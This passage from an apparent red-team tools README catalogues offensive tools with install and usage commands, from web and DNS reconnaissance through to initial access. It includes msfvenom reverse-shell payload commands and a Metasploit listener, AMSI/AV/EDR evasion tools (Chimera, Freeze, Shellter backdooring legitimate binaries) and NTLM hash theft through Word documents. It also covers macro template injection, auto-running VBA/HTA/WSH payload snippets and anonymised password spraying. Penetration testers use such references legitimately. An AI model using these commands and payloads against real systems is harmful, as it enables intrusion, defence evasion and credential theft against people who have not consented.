-f example.txt\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F223851512-068261fa-7070-4307-852c-7ef46d938b18.png)\n\n### [🔙](#tool-list)[gobuster](https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fgobuster\u002F)\n\nNice tool for brute forcing file\u002Ffolder paths on a victim website.\n\n**Install:** \n\n```bash\nsudo apt install gobuster\n```\n\n**Usage:** \n\n```bash\ngobuster dir -u \"https:\u002F\u002Fgoogle.com\" -w \u002Fusr\u002Fshare\u002Fwordlists\u002Fdirb\u002Fbig.txt --wildcard -b 301,401,403,404,500 -t 
20\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png)\n\n### [🔙](#tool-list)[feroxbuster](https:\u002F\u002Fgithub.com\u002Fepi052\u002Fferoxbuster)\n\nA tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.\n\nFeroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...\n\n**Install: (Kali)** \n\n```bash\nsudo apt update && sudo apt install -y feroxbuster\n```\n\n**Install: (Mac)** \n\n```bash\ncurl -sL https:\u002F\u002Fraw.githubusercontent.com\u002Fepi052\u002Fferoxbuster\u002Fmaster\u002Finstall-nix.sh | bash\n```\n\n**Install: (Windows)** \n\n```bash\nInvoke-WebRequest https:\u002F\u002Fgithub.com\u002Fepi052\u002Fferoxbuster\u002Freleases\u002Flatest\u002Fdownload\u002Fx86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip\nExpand-Archive .\\feroxbuster.zip\n.\\feroxbuster\\feroxbuster.exe -V\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fepi052.github.io\u002Fferoxbuster-docs\u002Fdocs\u002Finstallation\u002F).\n\n**Usage:** \n\n```bash\n# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url\n.\u002Fferoxbuster -u http:\u002F\u002F127.1 -x pdf -x js,html -x php txt json,docx\n\n# Scan with headers\n.\u002Fferoxbuster -u http:\u002F\u002F127.1 -H Accept:application\u002Fjson \"Authorization: Bearer {token}\"\n\n# Read URLs from stdin\ncat targets | .\u002Fferoxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files\n\n# Proxy requests through burpsuite\n.\u002Fferoxbuster -u http:\u002F\u002F127.1 --insecure --proxy http:\u002F\u002F127.0.0.1:8080\n```\n\n    
Full usage examples can be found [here](https:\u002F\u002Fepi052.github.io\u002Fferoxbuster-docs\u002Fdocs\u002Fexamples\u002F).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png)\n\n*Image used from https:\u002F\u002Fraw.githubusercontent.com\u002Fepi052\u002Fferoxbuster\u002Fmain\u002Fimg\u002Fdemo.gif*\n\n### [🔙](#tool-list)[CloudBrute](https:\u002F\u002Fgithub.com\u002F0xsha\u002FCloudBrute)\n\nA tool to find a company's (target's) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).\n\nFeatures:\n\n- Cloud detection (IPINFO API and Source Code)\n- Fast (concurrent)\n- Cross Platform (windows, linux, mac)\n- User-Agent Randomization\n- Proxy Randomization (HTTP, Socks5)\n\n**Install:** \n\nDownload the latest [release](https:\u002F\u002Fgithub.com\u002F0xsha\u002FCloudBrute\u002Freleases) for your system and follow the usage.\n\n**Usage:** \n\n```bash\n# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'\nCloudBrute -d target.com -k target -m storage -t 80 -T 10 -w \".\u002Fdata\u002Fstorage_small.txt\"\n\n# Restrict to one cloud provider and output results to file (-w needs the wordlist path)\nCloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w \".\u002Fdata\u002Fstorage_small.txt\" -c amazon -o target_output.txt\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729172-5d58d005-85a8-49f2-8968-98b459961f81.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002F0xsha\u002FCloudBrute*\n\n### [🔙](#tool-list)[dnsrecon](https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fdnsrecon\u002F#dnsrecon)\n\ndnsrecon is a Python tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.\n\n**Install:** \n\n```bash\nsudo apt install dnsrecon\n```\n\n**Usage:** \n\n```bash\ndnsrecon -d 
google.com\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png)\n\n### [🔙](#tool-list)[shodan.io](https:\u002F\u002Fwww.shodan.io\u002Fdashboard)\n\nShodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name or IP address, it is possible to discover potentially vulnerable systems relating to your target via Shodan.\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png)\n\n### [🔙](#tool-list)[AORT](https:\u002F\u002Fgithub.com\u002FD3Ext\u002FAORT)\n\nTool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FD3Ext\u002FAORT; cd AORT; pip3 install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\npython3 AORT.py -d google.com\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192070398-aae0217d-69c4-460b-ae4c-51b045551268.png)\n\n### [🔙](#tool-list)[spoofcheck](https:\u002F\u002Fgithub.com\u002FBishopFox\u002Fspoofcheck)\n\nA program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. 
Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF\u002FDKIM emails.\n\nDomains are spoofable if any of the following conditions are met:\n\n- Lack of an SPF or DMARC record\n- SPF record never specifies `~all` or `-all`\n- DMARC policy is set to `p=none` or is nonexistent\n\n**Install:**\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FBishopFox\u002Fspoofcheck; cd spoofcheck; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n.\u002Fspoofcheck.py [DOMAIN]\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png)\n\n### [🔙](#tool-list)[AWSBucketDump](https:\u002F\u002Fgithub.com\u002Fjordanpotti\u002FAWSBucketDump)\n\nAWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.\n\n**Install:**\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Fjordanpotti\u002FAWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\n```\n\n**Usage:** \n\n```\nusage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n  -h, --help    show this help message and exit\n  -D            Download files. 
This requires significant diskspace\n  -d            If set to 1 or True, create directories for each host w\u002F results\n  -t THREADS    number of threads\n  -l HOSTLIST\n  -g GREPWORDS  Provide a wordlist to grep for\n  -m MAXSIZE    Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\n```\n\n### [🔙](#tool-list)[GitHarvester](https:\u002F\u002Fgithub.com\u002Fmetac0rtex\u002FGitHarvester)\n\nNice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and\u002For projects.\n\n**Install:**\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Fmetac0rtex\u002FGitHarvester; cd GitHarvester\n```\n\n**Usage:** \n\n```\n.\u002Fgitharvester.py\n```\n\n### [🔙](#tool-list)[truffleHog](https:\u002F\u002Fgithub.com\u002Fdxa4481\u002FtruffleHog)\n\nTruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.\n\n**Install (Binaries):** [Link](https:\u002F\u002Fgithub.com\u002Ftrufflesecurity\u002Ftrufflehog\u002Freleases)\n\n**Install (Go):**\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Ftrufflesecurity\u002Ftrufflehog.git; cd trufflehog; go install\n```\n\n**Usage:** \n\n```\ntrufflehog https:\u002F\u002Fgithub.com\u002Ftrufflesecurity\u002Ftest_keys\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png)\n\n### [🔙](#tool-list)[Dismap](https:\u002F\u002Fgithub.com\u002Fzhzyker\u002Fdismap)\n\nDismap is an asset discovery and identification tool. 
It can quickly identify protocols and fingerprint information such as web\u002Ftcp\u002Fudp, locate asset types, and is suitable for internal and external networks.\n\nDismap has a complete fingerprint rule base, currently including tcp\u002Fudp\u002Ftls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.\n\n**Install:** \n\nDismap is a binary file for Linux, MacOS, and Windows. Go to [Release](https:\u002F\u002Fgithub.com\u002Fzhzyker\u002Fdismap\u002Freleases) to download the corresponding version to run:\n\n```bash\n# Linux or MacOS\nchmod +x dismap-0.3-linux-amd64\n.\u002Fdismap-0.3-linux-amd64 -h\n\n# Windows\ndismap-0.3-windows-amd64.exe -h\n```\n\n**Usage:** \n\n```bash\n# Scan 192.168.1.1 subnet\n.\u002Fdismap -i 192.168.1.1\u002F24\n\n# Scan, output to result.txt and json output to result.json\n.\u002Fdismap -i 192.168.1.1\u002F24 -o result.txt -j result.json\n\n# Scan, Not use ICMP\u002FPING to detect surviving hosts, timeout 10 seconds\n.\u002Fdismap -i 192.168.1.1\u002F24 --np --timeout 10\n\n# Scan, Number of concurrent threads 1000\n.\u002Fdismap -i 192.168.1.1\u002F24 -t 1000\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fzhzyker\u002Fdismap*\n\n### [🔙](#tool-list)[enum4linux](https:\u002F\u002Fgithub.com\u002FCiscoCXSecurity\u002Fenum4linux)\n\nA tool for enumerating information from Windows and Samba systems.\n\nIt can be used to gather a wide range of information, including:\n\n- Domain and domain controller information\n- Local user and group information\n- Shares and share permissions\n- Security policies\n- Active Directory information\n\n**Install: (Apt)** \n\n```bash\nsudo apt install enum4linux\n```\n\n**Install: (Git)** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FCiscoCXSecurity\u002Fenum4linux\ncd enum4linux\n```\n\n**Usage:** 
\n\n```bash\n# 'Do everything'\nenum4linux.pl -a 192.168.2.55\n\n# Obtain list of usernames (RestrictAnonymous = 0)\nenum4linux.pl -U 192.168.2.55\n\n# Obtain list of usernames (using authentication)\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n# Get a list of groups and their members\nenum4linux.pl -G 192.168.2.55\n\n# Verbose scan \nenum4linux.pl -v 192.168.2.55\n```\n\nFull usage information can be found in this [blog](https:\u002F\u002Flabs.portcullis.co.uk\u002Ftools\u002Fenum4linux\u002F).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png)\n\n*Image used from https:\u002F\u002Fallabouttesting.org\u002Fsamba-enumeration-for-penetration-testing-short-tutorial\u002F*\n\n### [🔙](#tool-list)[skanuvaty](https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc\u002Fskanuvaty)\n\nDangerously fast dns\u002Fnetwork\u002Fport scanner, created by [Esc4iCEscEsc](https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc), written in rust.\n\nYou will need a subdomains file. *E.g. 
[Subdomain wordlist by Sublist3r](https:\u002F\u002Fraw.githubusercontent.com\u002Faboul3la\u002FSublist3r\u002Fmaster\u002Fsubbrute\u002Fnames.txt)*.\n\n**Install:** \n\nDownload the latest release from [here](https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc\u002Fskanuvaty\u002Freleases).\n\n```bash\n# Install a wordlist\nsudo apt install wordlists\nls \u002Fusr\u002Fshare\u002Fdirb\u002Fwordlists\nls \u002Fusr\u002Fshare\u002Famass\u002Fwordlists\n```\n\n**Usage:** \n\n```bash\nskanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002FEsc4iCEscEsc\u002Fskanuvaty*\n\n### [🔙](#tool-list)[Metabigor](https:\u002F\u002Fgithub.com\u002Fj3ssie\u002Fmetabigor)\n\nMetabigor is an intelligence tool; its goal is to do OSINT tasks and more, but without any API key.\n\n**Main Features:**\n\n- Searching information about IP Address, ASN and Organization.\n- Wrapper for running rustscan, masscan and nmap more efficiently on IP\u002FCIDR.\n- Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).\n- Get a summary about an IP address (powered by [@thebl4ckturtle](https:\u002F\u002Fgithub.com\u002Ftheblackturtle))\n\n**Install:** \n\n```bash\ngo install github.com\u002Fj3ssie\u002Fmetabigor@latest\n```\n\n**Usage:** \n\n```bash\n# Discover IPs of a company\u002Forganization\necho \"company\" | metabigor net --org -o \u002Ftmp\u002Fresult.txt\n\n# Getting more related domains by searching for certificate info\necho 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is an old command\n\n# Only run rustscan with full ports\necho '1.2.3.4\u002F24' | metabigor scan -o result.txt\n\n# Reverse Whois to find related domains\necho 'example.com' | metabigor related -s 'whois'\n\n# 
Get Google Analytics ID directly from the URL\necho 'https:\u002F\u002Fexample.com' | metabigor related -s 'google-analytic'\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fj3ssie\u002Fmetabigor*\n\n### [🔙](#tool-list)[Gitrob](https:\u002F\u002Fgithub.com\u002Fmichenriksen\u002Fgitrob)\n\nGitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. \n\nGitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. \n\nThe findings will be presented through a web interface for easy browsing and analysis.\n\n**Note:** *Gitrob will need a Github access token in order to interact with the Github API. [Create a personal access token](https:\u002F\u002Fhelp.github.com\u002Farticles\u002Fcreating-a-personal-access-token-for-the-command-line\u002F) and save it in an environment variable in your .bashrc or similar shell configuration file:*\n\n```bash\nexport GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\n```\n\n**Install: (Go)** \n\n```bash\ngo get github.com\u002Fmichenriksen\u002Fgitrob\n```\n\n**Install: (Binary)** \n\nA [precompiled version](https:\u002F\u002Fgithub.com\u002Fmichenriksen\u002Fgitrob\u002Freleases) is available for each release.\n\n**Usage:** \n\n```bash\n# Run against org\ngitrob {org_name}\n\n# Saving session to a file\ngitrob -save ~\u002Fgitrob-session.json acmecorp\n\n# Loading session from a file\ngitrob -load ~\u002Fgitrob-session.json\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png)\n\n*Image used from https:\u002F\u002Fwww.uedbox.com\u002Fpost\u002F58828\u002F*\n\n### 
[🔙](#tool-list)[gowitness](https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness)\n\nGowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.\n\n**Install: (Go)** \n\n```bash\ngo install github.com\u002Fsensepost\u002Fgowitness@latest\n```\n\nFull installation information can be found [here](https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness\u002Fwiki\u002FInstallation).\n\n**Usage:** \n\n```bash\n# Screenshot a single website\ngowitness single https:\u002F\u002Fwww.google.com\u002F\n\n# Screenshot a cidr using 20 threads\ngowitness scan --cidr 192.168.0.0\u002F24 --threads 20\n\n# Screenshot open http services from an namp file\ngowitness nmap -f nmap.xml --open --service-contains http\n\n# Run the report server\ngowitness report serve\n```\n\nFull usage information can be found [here](https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness\u002Fwiki\u002FUsage).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png)\n\n*Image used from https:\u002F\u002Fgithub.com\u002Fsensepost\u002Fgowitness*\n\nResource Development\n====================\n\n### [🔙](#tool-list)[remoteInjector](https:\u002F\u002Fgithub.com\u002FJohnWoodman\u002Fremoteinjector)\n\nInjects link to remote word template into word document.\n\nThis Python-based utility modifies a .docx file’s settings.xml.rels link to a remote hosted .dotm template containing a VBA macro, executing when the document is opened and macros are enabled.\n\n[Related Blog Post](https:\u002F\u002Fjohn-woodman.com\u002Fresearch\u002Fvba-macro-remote-template-injection\u002F)\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002FJohnWoodman\u002Fremoteinjector;cd remoteinjector\n```\n\n**Usage:** 
\n\n```bash\npython3 remoteinjector.py -w https:\u002F\u002Fexample.com\u002Ftemplate.dotm example.docx\n```\n\n### [🔙](#tool-list)[Chimera](https:\u002F\u002Fgithub.com\u002Ftokyoneon\u002FChimera)\n\nChimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.\n\n**Install:** \n\n```bash\nsudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git\nsudo git clone https:\u002F\u002Fgithub.com\u002Ftokyoneon\u002Fchimera \u002Fopt\u002Fchimera\nsudo chown $USER:$USER -R \u002Fopt\u002Fchimera\u002F; cd \u002Fopt\u002Fchimera\u002F\nsudo chmod +x chimera.sh; .\u002Fchimera.sh --help\n```\n\n**Usage:** \n\n```bash\n.\u002Fchimera.sh -f shells\u002FInvoke-PowerShellTcp.ps1 -l 3 -o \u002Ftmp\u002Fchimera.ps1 -v -t powershell,windows,\\\ncopyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\\\ninvoke-expression,out-string,write-error -j -g -k -r -p\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F209867736-5c35cec0-9227-4f18-a439-a5c954342818.png)\n\n### [🔙](#tool-list)[msfvenom](https:\u002F\u002Fwww.offensive-security.com\u002Fmetasploit-unleashed\u002FMsfvenom\u002F)\n\nMsfvenom allows the creation of payloads for various operating systems in a wide range of formats. 
It also supports obfuscation of payloads for AV bypass.\n\n**Set Up Listener**\n\n```shell\nuse exploit\u002Fmulti\u002Fhandler \nset PAYLOAD windows\u002Fmeterpreter\u002Freverse_tcp \nset LHOST your-ip \nset LPORT listening-port \nrun\n```\n\n#### Msfvenom Commands\n\n**PHP:** \n\n```bash\nmsfvenom -p php\u002Fmeterpreter\u002Freverse_tcp lhost=192.168.0.9 lport=1234 R\n```\n\n**Windows:** \n\n```bash\nmsfvenom -p windows\u002Fshell\u002Freverse_tcp LHOST=\u003CIP> LPORT=\u003CPORT> -f exe > shell-x86.exe\n```\n\n**Linux:** \n\n```bash\nmsfvenom -p linux\u002Fx86\u002Fshell\u002Freverse_tcp LHOST=\u003CIP> LPORT=\u003CPORT> -f elf > shell-x86.elf\n```\n\n**Java:** \n\n```bash\nmsfvenom -p java\u002Fjsp_shell_reverse_tcp LHOST=\u003CIP> LPORT=\u003CPORT> -f raw > shell.jsp\n```\n\n**HTA:** \n\n```bash\nmsfvenom -p windows\u002Fshell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png)\n\n### [🔙](#tool-list)[Shellter](https:\u002F\u002Fwww.shellterproject.com\u002F)\n\nShellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.\n\nIt can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).\n\nShellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, or anything else that would look dodgy under an AV scan.\n\nFull README information can be found [here](https:\u002F\u002Fwww.shellterproject.com\u002FDownloads\u002FShellter\u002FReadme.txt).\n\n**Install: (Kali)** \n\n```bash\napt-get update\napt-get install shellter\n```\n\n**Install: (Windows)** \n\nVisit the [download page](https:\u002F\u002Fwww.shellterproject.com\u002Fdownload\u002F) and install.\n\n**Usage:** 
\n\nJust pick a legit binary to backdoor and run Shellter.\n\nSome nice tips can be found [here](https:\u002F\u002Fwww.shellterproject.com\u002Ftipstricks\u002F).\n\nLots of community usage demos can be found [here](https:\u002F\u002Fwww.shellterproject.com\u002Fshellter-community-demos\u002F).\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729343-612cde48-0ce1-48e6-b342-5252193a974c.png)\n\n*Image used from https:\u002F\u002Fwww.kali.org\u002Ftools\u002Fshellter\u002Fimages\u002Fshellter.png*\n\n### [🔙](#tool-list)[Freeze](https:\u002F\u002Fgithub.com\u002Foptiv\u002FFreeze)\n\nFreeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. \n\nFreeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Foptiv\u002FFreeze\ncd Freeze\ngo build Freeze.go\n```\n\n**Usage:** \n\n```\n  -I string\n        Path to the raw 64-bit shellcode.\n  -O string\n        Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.\n  -console\n        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.\n  -encrypt\n        Encrypts the shellcode using AES 256 encryption\n  -export string\n        For DLL Loaders Only - Specify a specific Export function for a loader to have.\n  -process string\n        The name of process to spawn. This process has to exist in C:\\Windows\\System32\\. 
Example 'notepad.exe' (default \"notepad.exe\")\n  -sandbox\n        Enables sandbox evasion by checking:\n                Is Endpoint joined to a domain?\n                Does the Endpoint have more than 2 CPUs?\n                Does the Endpoint have more than 4 gigs of RAM?\n  -sha256\n        Provides the SHA256 value of the loaders (This is useful for tracking)\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png)\n\n*Image used from https:\u002F\u002Fwww.blackhatethicalhacking.com\u002Ftools\u002Ffreeze\u002F*\n\n### [🔙](#tool-list)[WordSteal](https:\u002F\u002Fgithub.com\u002F0x09AL\u002FWordSteal)\n\nThis script will create a Microsoft Word document with a remote image, allowing for the capture of NTLM hashes from a remote victim endpoint.\n\nMicrosoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker-controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image. 
\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002F0x09AL\u002FWordSteal\ncd WordSteal\n```\n\n**Usage:** \n\n```bash\n# Generate a document containing 'test.jpg' and start the listener\n.\u002Fmain.py 127.0.0.1 test.jpg 1\n\n# Generate a document containing 'test.jpg' and do not start the listener\n.\u002Fmain.py 127.0.0.1 test.jpg 0\n```\n\n![image](https:\u002F\u002Fuser-images.githubusercontent.com\u002F100603074\u002F217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png)\n\n*Image used from https:\u002F\u002Fpentestit.com\u002Fwordsteal-steal-ntlm-hashes-remotely\u002F*\n\n### [🔙](#tool-list)[NTAPI Undocumented Functions](http:\u002F\u002Fundocumented.ntinternals.net\u002F)\n\nThis site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system. \n\nIt can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.\n\nWhen developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.\n\n**Usage:** \n\nVisit [http:\u002F\u002Fundocumented.ntinternals.net\u002F](http:\u002F\u002Fundocumented.ntinternals.net\u002F)\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002F41b424f3-053c-440b-b0fd-235e95980d9a)\n\n*Image used from http:\u002F\u002Fundocumented.ntinternals.net\u002F*\n\n### [🔙](#tool-list)[Kernel Callback Functions](https:\u002F\u002Fcodemachine.com\u002Farticles\u002Fkernel_callback_functions.html)\n\nThis technical note provides a comprehensive list of all the APIs exported by the Windows kernel that driver writers use to register callback routines, which are invoked by kernel components under various circumstances. 
\n\nMost of these routines are documented in the Windows Driver Kit (WDK), but some of them are only for use by in-box drivers. \n\nThe undocumented functions are described briefly, whereas the documented ones are just listed here for reference.\n\n**Usage:** \n\nVisit [https:\u002F\u002Fcodemachine.com\u002Farticles\u002Fkernel_callback_functions.html](https:\u002F\u002Fcodemachine.com\u002Farticles\u002Fkernel_callback_functions.html)\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002Fb7532b7d-1abc-4af6-be92-f6f78d24a788)\n\n*Image used from https:\u002F\u002Fcodemachine.com*\n\n### [🔙](#tool-list)[OffensiveVBA](https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t\u002FOffensiveVBA)\n\nA collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via Office macros.\n\n**Usage:** \n\nVisit [https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t\u002FOffensiveVBA#templates-in-this-repo](https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t\u002FOffensiveVBA#templates-in-this-repo)\n\n![image](https:\u002F\u002Fgithub.com\u002FA-poc\u002FRedTeam-Tools\u002Fassets\u002F100603074\u002F7f7ad942-48d7-42e7-a3cc-55ec84139058)\n\n*Image used from https:\u002F\u002Fgithub.com\u002FS3cur3Th1sSh1t*\n\n### [🔙](#tool-list)WSH\n\n**Creating payload:** \n\n```vbs\n' VBScript Sub calls with several arguments take no parentheses\nSet shell = WScript.CreateObject(\"Wscript.Shell\")\nshell.Run \"C:\\Windows\\System32\\calc.exe \" & WScript.ScriptFullName, 0, True\n```\n\n**Execute:** \n\n```bash\nwscript payload.vbs\ncscript.exe payload.vbs\nwscript \u002Fe:VBScript payload.txt \u002F\u002FIf .vbs files are blacklisted\n```\n\n### [🔙](#tool-list)HTA\n\n**Creating payload:**\n\n```html\n\u003Chtml>\n\u003Cbody>\n\u003Cscript>\n\tvar c = 'cmd.exe';\n\tnew ActiveXObject('WScript.Shell').Run(c);\n\u003C\u002Fscript>\n\u003C\u002Fbody>\n\u003C\u002Fhtml>\n```\n\n**Execute:** Run the file\n\n### [🔙](#tool-list)VBA\n\n**Creating payload:**\n\n```vb\nSub calc()\n\tDim payload As String\n\tpayload = \"calc.exe\"\n\tCreateObject(\"Wscript.Shell\").Run payload, 0\nEnd Sub\n```\n\n**Execute:** Set the function to Auto_Open() in a macro-enabled document\n\nInitial Access\n====================\n\n### [🔙](#tool-list)[CredMaster](https:\u002F\u002Fgithub.com\u002Fknavesec\u002FCredMaster)\n\nLaunch a password spray \u002F brute force attack via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. This dynamically creates FireProx APIs for more evasive password sprays.\n\nCredMaster provides a method of running anonymous password sprays against endpoints in a simple, easy-to-use tool. The FireProx tool provides the rotating request IP, while the base of CredMaster spoofs all other identifying information.\n\nFeatures:\n- Fully supports all AWS Regions\n- Automatically generates APIs for proxy pass-through\n- Spoofs API tracking numbers, forwarded-for IPs, and other proxy tracking headers\n- Multi-threaded processing\n- Password delay counters & configuration for lockout policy evasion\n- Easily add new plugins\n- Fully anonymous\n\n**Install:** \n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fknavesec\u002FCredMaster;cd CredMaster;pip install -r requirements.txt\n```\n\nFor full installation instructions see [here](https:\u002F\u002Fwhynotsecurity.com\u002Fblog\u002Fcredmaster\u002F#setup).\n\n**Usage:** \n\n```bash\npython3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}\npython3 credmaster.py --config config.json\n```\n\nThis tool requires AWS API access keys; a walkthrough on how to acquire these keys can be found here: https:\u002F\u002Fbond-o.medium.com\u002Faws-pass-through-proxy-84f1f7fa4b4b\n\n![credmaster](https:\u002F\u002Fgithub.com\u002Fuser-attachments\u002Fassets\u002Ff678cca4-7a53-41e7-9323-51e8efd0e6ba)\n\n*Image used from 